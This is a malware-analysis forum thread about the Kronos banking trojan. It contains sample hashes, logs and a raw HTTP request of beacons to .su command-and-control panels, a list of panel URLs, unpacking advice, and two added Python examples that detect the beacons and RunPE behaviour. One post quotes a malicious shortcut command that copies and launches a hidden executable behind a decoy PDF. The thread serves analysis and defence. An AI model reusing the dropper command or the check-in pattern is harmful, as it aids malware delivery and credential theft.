Kronos

Forum for analysis and discussion about malware.
Intimacygel
Posts: 24
Joined: Wed Jun 05, 2013 3:16 pm

Tue Jul 15, 2014 1:49 pm

Hi All,

Was wondering if anyone has heard of or seen samples of the supposed replacement for Zeus, "Kronos".

http://www.csoonline.com/article/245363 ... um=twitter


Thanks!
Sargerras
Posts: 9
Joined: Mon May 13, 2013 12:23 pm

Tue Aug 05, 2014 9:30 am

Hi, just sharing this thread:
http://securityblog.s21sec.com/2014/08/ ... -here.html

Sample of Kronos attached.

MD5: f085395253a40ce8ca077228c2322010
http://www.virustotal.com/file/9806d1b6 ... /analysis/
Kafeine
Posts: 105
Joined: Thu Jul 28, 2011 1:19 pm

Tue Jan 27, 2015 6:57 pm

A fresh one (pushed in Sweet Orange).

01/27/2015-08:15:33.214071 bitcoind.su [**] /krpanel/connect.php [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 89 bytes [**] 192.168.[xx]:1035 -> 92.87.96.9:80
01/27/2015-08:15:34.625277 bitcoind.su [**] /krpanel/connect.php?a=1 [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 41 bytes [**] 192.168.[xx]:1035 -> 92.87.96.9:80
pwnslinger
Posts: 9
Joined: Mon May 04, 2015 5:27 pm

Wed Nov 25, 2015 6:50 pm

Hi,
It uses a VB6 packing method and executes shellcode which is packed by MoleBox or something like that (PUSHAD, CALL).
But I don't know why I just got into this loop; it enumerates through all procedure names...
Hint me, please.

Sample also attached below.
comak
Posts: 43
Joined: Mon Oct 14, 2013 8:25 am

Thu Nov 26, 2015 11:14 am

This is Kronos:

http://bitcoind.su:80/krpanel/connect.php
http://bulletvpn.su:80/krpanel/connect.php
http://thereturn15.su:80/krpanel/connect.php
http://skycard.su:80/krpanel/connect.php
http://cyberhosting.su:80/krpanel/connect.php
http://skycard.su:80/krpanel/connect.php
cheers,
mak
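Added example, not code from Kafeine's or comak's posts: a small Python detector that parses http.log lines in the format quoted above and flags the Kronos check-in pattern (POST to /krpanel/connect.php, optionally with ?a=<n>) against the panel hosts listed in this thread. The log sample is constructed from the quoted lines plus one benign request, and the nine-field " [**] " layout is assumed from the lines as posted.

```python
import re

# Constructed copy of the Suricata-style http.log lines quoted in the thread plus one
# benign GET for contrast; the [xx] masking of the victim host is kept as posted.
SAMPLE_LOG = """\
01/27/2015-08:15:33.214071 bitcoind.su [**] /krpanel/connect.php [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 89 bytes [**] 192.168.[xx]:1035 -> 92.87.96.9:80
01/27/2015-08:15:34.625277 bitcoind.su [**] /krpanel/connect.php?a=1 [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 41 bytes [**] 192.168.[xx]:1035 -> 92.87.96.9:80
01/27/2015-08:16:02.000001 www.example.com [**] /index.html [**] Mozilla/5.0 (Windows NT 6.1) [**] <no referer> [**] GET [**] HTTP/1.1 [**] 200 [**] 5120 bytes [**] 192.168.[xx]:1036 -> 203.0.113.5:80
"""
# Panel hosts listed by comak in this thread (all serve /krpanel/connect.php).
KNOWN_PANEL_HOSTS = {"bitcoind.su", "bulletvpn.su", "thereturn15.su", "skycard.su", "cyberhosting.su"}
# Kronos check-in path, with the optional ?a=<n> seen on the second beacon.
PANEL_PATH = re.compile(r"^/krpanel/connect\.php(\?a=\d+)?$")

def parse_http_log_line(line):
    """Split one ' [**] '-delimited http.log line into a dict; None if malformed."""
    fields = line.rstrip("\n").split(" [**] ")
    if len(fields) != 9:
        return None
    ts, _, host = fields[0].partition(" ")          # "date-time host"
    src, _, dst = fields[8].partition(" -> ")       # "src:port -> dst:port"
    return {"ts": ts, "host": host, "uri": fields[1], "user_agent": fields[2],
            "method": fields[4], "status": fields[6], "src": src, "dst": dst}

def classify(ev):
    """Reason string if the request matches the Kronos check-in pattern, else None."""
    reasons = []
    if ev["method"] == "POST" and PANEL_PATH.match(ev["uri"]):
        reasons.append("POST to /krpanel/connect.php")
    if ev["host"] in KNOWN_PANEL_HOSTS:
        reasons.append("known panel host " + ev["host"])
    return "; ".join(reasons) or None

def scan(log_text):
    """Return (ts, src, host, uri, reason) for every line that looks like a Kronos beacon."""
    hits = []
    for line in log_text.splitlines():
        ev = parse_http_log_line(line)
        reason = classify(ev) if ev else None
        if reason:
            hits.append((ev["ts"], ev["src"], ev["host"], ev["uri"], reason))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit, sep=" | ")
```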
EP_X0FF
Global Moderator
Posts: 4903
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation

Thu Nov 26, 2015 11:33 am

pwnslinger wrote:
Hi,
It uses a VB6 packing method and executes shellcode which is packed by MoleBox or something like that (PUSHAD, CALL).
But I don't know why I just got into this loop; it enumerates through all procedure names...
Hint me, please.

Sample also attached below.
As with most of the malware crypters used for ZBot, its "decryption" is based on the moment when RunPE is executed. Set a breakpoint on CreateProcess and dump the memory region it will attempt to write to the zombie target process.

https://www.virustotal.com/en/file/e4e0 ... 448537374/

"Unpacked" Kronos attached. Posts moved.
Ring0 - the source of inspiration
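Added example, not EP_X0FF's own code or tooling: a Python walk over a constructed sandbox API trace that applies the advice above, pairing a CreateProcess call made with CREATE_SUSPENDED to the later WriteProcessMemory calls into that process and reporting the address range to dump before ResumeThread lets the payload run. The trace format and the PID-as-handle simplification are assumptions made for illustration.

```python
CREATE_SUSPENDED = 0x00000004  # dwCreationFlags bit a RunPE loader sets on the zombie process

# Constructed sandbox trace as (api_name, args) pairs (illustrative format, not any real
# tool's): the crypter spawns a suspended copy of itself, carves out the mapped image,
# writes the decrypted payload section by section and resumes the main thread.
# Handles are simplified to the target PID so the calls can be correlated.
SAMPLE_TRACE = [
    ("CreateProcessW", {"lpCommandLine": r"C:\samples\crypter.exe",
                        "dwCreationFlags": CREATE_SUSPENDED, "dwProcessId": 1234}),
    ("NtUnmapViewOfSection", {"ProcessHandle": 1234, "BaseAddress": 0x400000}),
    ("VirtualAllocEx", {"hProcess": 1234, "lpAddress": 0x400000, "dwSize": 0x27000}),
    ("WriteProcessMemory", {"hProcess": 1234, "lpBaseAddress": 0x400000, "nSize": 0x400}),
    ("WriteProcessMemory", {"hProcess": 1234, "lpBaseAddress": 0x401000, "nSize": 0x1E000}),
    ("WriteProcessMemory", {"hProcess": 1234, "lpBaseAddress": 0x41F000, "nSize": 0x8000}),
    ("SetThreadContext", {"hThread": 1234}),
    ("ResumeThread", {"hThread": 1234}),
]

def find_runpe(trace):
    """Map PID -> {'writes': [(addr, size)], 'resumed': bool} for every process created
    suspended that later receives WriteProcessMemory: the RunPE sequence."""
    suspects = {}
    for name, a in trace:
        if name.startswith("CreateProcess") and a.get("dwCreationFlags", 0) & CREATE_SUSPENDED:
            suspects[a["dwProcessId"]] = {"writes": [], "resumed": False}
        elif name == "WriteProcessMemory" and a.get("hProcess") in suspects:
            suspects[a["hProcess"]]["writes"].append((a["lpBaseAddress"], a["nSize"]))
        elif name == "ResumeThread" and a.get("hThread") in suspects:
            suspects[a["hThread"]]["resumed"] = True
    return {pid: s for pid, s in suspects.items() if s["writes"]}

def dump_region(writes):
    """Smallest [lo, hi) range covering every write: the region to dump from the zombie
    process before ResumeThread lets the payload run."""
    lo = min(addr for addr, _ in writes)
    hi = max(addr + size for addr, size in writes)
    return lo, hi

if __name__ == "__main__":
    for pid, info in find_runpe(SAMPLE_TRACE).items():
        lo, hi = dump_region(info["writes"])
        print(f"pid {pid}: dump 0x{lo:X}-0x{hi:X}, {len(info['writes'])} writes, resumed={info['resumed']}")
```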
henices
Posts: 3
Joined: Fri Aug 01, 2014 7:29 am

Thu Dec 03, 2015 2:13 am

Kafeine wrote:
A fresh one (pushed in Sweet Orange).

01/27/2015-08:15:33.214071 bitcoind.su [**] /krpanel/connect.php [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 89 bytes [**] 192.168.[xx]:1035 -> 92.87.96.9:80
01/27/2015-08:15:34.625277 bitcoind.su [**] /krpanel/connect.php?a=1 [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 41 bytes [**] 192.168.[xx]:1035 -> 92.87.96.9:80

POST /krpanel/connect.php HTTP/1.1 
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) 
Host: bitcoind.su 
Content-Length: 74 
Cache-Control: no-cache  

WzW,c`cfgcgzcozccazedzeefdfdb*W
The attachment is the report.
pwnslinger
Posts: 9
Joined: Mon May 04, 2015 5:27 pm

Thu Dec 03, 2015 8:07 pm

EP_X0FF wrote:
pwnslinger wrote:
Hi,
It uses a VB6 packing method and executes shellcode which is packed by MoleBox or something like that (PUSHAD, CALL).
But I don't know why I just got into this loop; it enumerates through all procedure names...
Hint me, please.

Sample also attached below.
As with most of the malware crypters used for ZBot, its "decryption" is based on the moment when RunPE is executed. Set a breakpoint on CreateProcess and dump the memory region it will attempt to write to the zombie target process.

https://www.virustotal.com/en/file/e4e0 ... 448537374/

"Unpacked" Kronos attached. Posts moved.
Thanks EP. ;)

After dumping the second stage (explorer.exe) (changing the EP with PUSH/RET) using the EBFE method for attaching with OllyDbg,
I don't know why, when I want to toggle a breakpoint on the code, Olly can't and just runs (memory regions are RWC!).
Then I used F4 (run till selection) and a hardware breakpoint,
but when it calls SYSENTER... I can't take control back.
pwnslinger
Posts: 9
Joined: Mon May 04, 2015 5:27 pm

Fri Feb 12, 2016 10:27 am

I got another variant of Zbot on my system today.
The .rsrc section is base64 encoded. At first I thought about the Ranbyus banking trojan.
Also a shortcut was created for running the malware, with this content:

%ALLUSERSPROFILE%\..\..\windows\system32\cmd.exe /c "start %cd%Statically_detecting_use_after_free_on_binary_code.pdf & attrib -s -h %cd%DqGLtNo.exe & xcopy /F /S /Q /H /R /Y %cd%DqGLtNo.exe %temp%\JHQtm\ & attrib +s +h %cd%DqGLtNo.exe & start %temp%\JHQtm\Dq

The export table contains a callback function. I checked it with IDA and I didn't see any useful call.
Where should I start?

Sample attached.
puzzlex
Posts: 20
Joined: Tue Oct 20, 2015 12:22 pm

Fri Feb 12, 2016 1:18 pm

This DqGLtNo.exe is packed multiple times. Here is the final payload: https://www.virustotal.com/en/file/18f8 ... /analysis/